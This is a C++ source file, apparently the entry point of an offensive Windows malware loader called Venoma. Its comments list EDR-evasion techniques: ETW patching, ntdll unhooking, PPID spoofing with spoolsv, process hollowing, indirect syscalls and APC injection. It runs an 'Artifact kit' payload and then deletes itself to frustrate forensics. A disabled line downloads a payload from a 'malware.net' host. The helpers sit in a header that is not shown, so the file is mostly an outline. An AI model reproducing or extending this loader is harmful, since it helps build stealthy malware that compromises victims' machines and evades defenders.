Venoma.cpp
#include <Windows.h>
#include <winhttp.h>
#include <iostream>
#include "Ven.h"
// Entry point of the loader as listed on this page. Every helper it calls
// (GetPID, execArtifact, DeleteSelf) and every commented-out alternative is
// declared in "Ven.h", which is not part of this listing; what those helpers
// actually do is known here only from the author's one-line labels below.
// Takes no arguments; returns implicitly (falls off the end of main).
int main()
{
// The seven lines below are a list of technique names, not calls: nothing in
// this listing shows where, or whether, each one is implemented.
// Compile Time API Hashing
// Run-Time Dynamic Linking
// PPID spoofing
// Process hollowing
// Indirect syscalls execution
// APC execution
// Patching the Event Tracing for Windows (ETW) to prevent detection
// evt_patch();
// Create a fresh copy of the ntdll library from file to unhook functions
// unhooking();
// NOTE(review): evt_patch() and unhooking() are both commented out, so in this
// build control goes straight to the PID lookup; whether the helpers called
// later perform those steps themselves cannot be told from here.
// Get spoolsv PID for PPID spoofing
DWORD pid = GetPID();
// For payload download
// std::vector<BYTE> sh = Download(L"malware.net\0", L"/payload.bin\0");
// For synchronous payload execution with PPID spoofing through process hollowing
//Indirect_RawExec_ppid(pid);
// For APC execution with indirect syscalls
// IndirectAPC();
// For APC execution in a remote process with indirect syscalls
// IndirectRemoteAPC(pid);
// NOTE(review): of the execution paths above only execArtifact is live; the
// Download, *_RawExec_ppid and *APC variants are disabled comments, and the
// host and path strings in the Download line are the author's sample values.
// For Artifact kit execution with PPID spoofing through process hollowing
execArtifact(pid);
// For self-deletion to prevent post-compromise analysis
DeleteSelf();
// NOTE(review): for anyone examining a host after the fact — the author's
// label states the binary removes itself as its last action, and no return
// value from either call is inspected, so nothing in this listing records
// whether execution or deletion succeeded.
}